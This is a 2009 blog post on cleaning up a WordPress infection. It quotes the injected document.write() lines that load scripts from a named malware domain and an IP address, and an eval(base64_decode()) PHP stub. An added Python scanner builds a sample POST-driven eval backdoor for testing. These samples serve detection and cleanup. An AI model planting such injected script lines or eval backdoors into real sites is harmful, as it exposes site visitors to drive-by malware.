Dealing with malware in WordPress
filed in Geek Tips, Lame List, Tutorials and Tips, Web Media Reviews, Wordpress Tutorials on Nov.13, 2009
With my ear to the trends of the internet, I have seen several web site owners hijacked by a script that adds code to multiple file types in order to redirect the visitor to a malware site. The destination site, tallestbuildingslist(dot)com (DO NOT GO TO THAT SITE), can redirect users to other malware sites and has been reported by Google to install a trojan via an IE exploit (thus another reason to have Safari-based Google Chrome). The same can be found at other site addresses that accompany the script (one such address is 202.143.140.50, a Thailand server noted as unsafe by Norton SafeWeb). Google has identified a trend on the IP block associated with Lunarpages, a web services company that controls the source IP of tallestbuildingslist.com. As of November 13, 889 sites on the Lunarpages (AS15244) IP network had hosted malicious code in their content over the previous 90 days (out of 6790 sites). 13% of your clients serving malware is a big concern in my book.
It is always concerning when you get hacked; your sense of security drops and you feel like someone is targeting you. In this case, the hack seems to be focused on WordPress. Of the people I’ve dealt with (in my regular job) who have been hacked, all of them have had WordPress blogs, and the pages with malicious code have been WordPress-specific files (wp-config.php, wp-config-sample.php, etc.). The code is not in all PHP files, but it also seems to infect standalone JavaScript files (.js).
I have included a sample of the code the infection adds, so you can tell for sure whether or not you have been infected with this specific malware.
Here is a sample of what is written in .js files. This will almost always be at the bottom of the file, sometimes outside the comment brackets.
document.write('<script src=http://tallestbuildingslist.com/buildingimages/header.php ><\/script>');
document.write('<script src=http://202.143.140.50/eoffice/tello.php ><\/script>');
document.write('<script src=http://202.143.140.50/eoffice/tello.php ><\/script>');
PHP files are infected with base64-encoded code that is passed to eval(); it performs the malware redirect or download (depending on the version of this malware). Example of the base64 code:
<?php eval(base64_decode('[base64 payload omitted]')); ?><?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information by.....
(This is an example in the index.php file of WordPress)
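A small scanner for the two indicators described above (the document.write() line appended to .js files and eval(base64_decode(...)) in PHP files), added here as an example and not code from the original post. The sample inputs are constructed: the .js line is the one quoted above, and the PHP stub's payload is the eval(base64_decode($_POST['e'])) line that the post's blob decodes to; the indicator strings checked inside a decoded payload are assumptions based on that decoded sample (it registers output and error handlers and ends with that backdoor) and are not exhaustive.

```python
import base64
import re
from pathlib import Path

# Injected remote <script> tag that the infection appends to .js files.
JS_INJECT = re.compile(
    r"document\.write\(\s*['\"]<script\s+src=(?P<src>https?://[^\s'\">]+)"
    r"\s*>\s*<\\?/script>['\"]\s*\)", re.IGNORECASE)
# eval() of base64_decode() with a literal payload, as seen in wp-config.php.
PHP_EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"](?P<b64>[A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.IGNORECASE)
# Assumed indicators inside a decoded payload (the post's sample installs
# output/error handlers and ends in an eval(base64_decode($_POST['e'])) backdoor).
DECODED_INDICATORS = ("eval(", "base64_decode(", "$_POST",
                      "ob_start(", "set_error_handler(")

def scan_text(text, name="<buffer>"):
    """Return (name, kind, detail) findings for one file's contents."""
    findings = []
    for m in JS_INJECT.finditer(text):
        findings.append((name, "js-remote-script", m.group("src")))
    for m in PHP_EVAL_B64.finditer(text):
        raw = re.sub(r"\s+", "", m.group("b64"))
        try:
            decoded = base64.b64decode(raw, validate=True).decode("latin-1")
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded = ""
        hits = [s for s in DECODED_INDICATORS if s in decoded]
        findings.append((name, "php-eval-base64", ",".join(hits) or "undecodable"))
    return findings

def scan_tree(root):
    """Walk a WordPress install and scan every .php and .js file in it."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in (".php", ".js"):
            findings.extend(scan_text(path.read_text(errors="replace"), str(path)))
    return findings

# Constructed samples: the .js line quoted in the post, and a PHP stub whose
# payload is the backdoor line the post's blob decodes to.
SAMPLE_JS = ("/* jquery.foo.js */\n"
             "document.write('<script src=http://tallestbuildingslist.com/"
             "buildingimages/header.php ><\\/script>');\n")
_PAYLOAD = base64.b64encode(b"eval(base64_decode($_POST['e']));").decode()
SAMPLE_PHP = "<?php eval(base64_decode('" + _PAYLOAD + "')); ?><?php\n/** wp-config */\n"
CLEAN_PHP = "<?php\n/** The base configurations of the WordPress. */\n"
```

Run scan_tree() against a downloaded copy of the site tree rather than on the live server; every finding names the file, so you can decide what to hand-inspect before wiping and re-uploading.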
The fix is not as easy as just removing the code. It can hide in other places like plugin files and linked javascript in plugins. Because of the complexity of WordPress file structure and includes, it is sometimes very difficult to remove this issue completely. If you miss one PHP file or one line of code, it could propagate the malware code again to other files.
Solution?
First, you need to be making backups routinely. If your hosting service does not have an auto-backup tool, and you are not using one of the many backup plugins for WordPress, you need to make a note for yourself to make a backup each month or, for larger sites, each week. Keep at least three archived so you have a stock of backups, in case the infection was included in one of your recent backups. If you are not making backups, don’t expect to keep all of your content.
To get rid of this infection, you first need to do a check on your computer. Scan with antivirus, anti-malware, anti-spyware and anti-hijack tools. I’d list a million of them that might work, but the best (and cheapest, in other words free) collection that has worked for me is as follows:
- AVG Free – Antivirus
- Spyware S&D – Spyware and malware prevention
- Malwarebytes – thorough scan for malware
- Regseeker – registry cleaner and checker
This little group has kept me virus free (virtually) for years. Run something like this to start with. Avoid your site until the rest has been done to clean out the infestation on your server.
1. Change the password to your hosting account (not FTP, but the account in which you have your control panel and settings, usually on your host’s web site).
2. Verify you have a backup of files, or at least the source files you need to make your site work.
3. WordPress users must make sure the backup archive on your computer has the right database information in the wp-config file. If this is incorrect, your site will not work when uploaded again.
4. If you need some custom code, open the file remotely (or use Filezilla’s edit feature) and copy that custom code to a fresh version of the file. If you do need to download the file to edit it, do not open it; just edit it in Notepad or a similar text editor. Once the code is copied, delete the copy you took from your server.
5. Remove all files from your server. Do not download them.
6. Once all files are gone, upload fresh copies of the files.
7. Change your FTP password for all users possibly tied to your FTP host.
This process should take at most an hour for most installations. The database is not affected by this infection, but it should be backed up regularly as well. There is no need, as far as I can tell, to drop and then reinsert your database tables.
This is the same process you would take for most malware infestations. Sometimes you need to reload your database, but that is just an extra step in this process (somewhere between step 4 and step 5).
Note that you will need to do this to all of the sites on your FTP server, especially if you have more than one WordPress installation. My suggestion is to make backups that can be saved on your computer, and for picky webmasters you may want to burn these onto a DVD-RW. I suggest this media rather than a thumb drive or other memory-based device because infected files on a DVD-RW can’t infect other files on the same media, whereas a thumb drive can have that vulnerability. It also allows you to remove old backups as needed.
Lunarpages is going to take a lot of heat if it can’t track down and kill this “drive-by-download” infestation on their network. It has already caused havoc on random WordPress sites. It won’t be long before another regulating body will need to step in. For the time being, however, I suggest being careful when signing up for hosting through Lunarpages or one of their resellers if you have WordPress.

November 14th, 2009 on 2:30 am
If you have no web host as yet, and are seeking one from which to operate your blog, then make sure that your host offers MySQL. Cloak Url
November 15th, 2009 on 6:51 am
[...] This post was mentioned on Twitter by Joe, Joe. Joe said: JoeRyder.com >>> Dealing with malware in WordPress: document.write(’<script .. http://bit.ly/2aCVT7 [...]
December 3rd, 2009 on 6:25 am
Hi
Exactly what I said, you are so true about that, but they won’t listen
Thanks
Lauren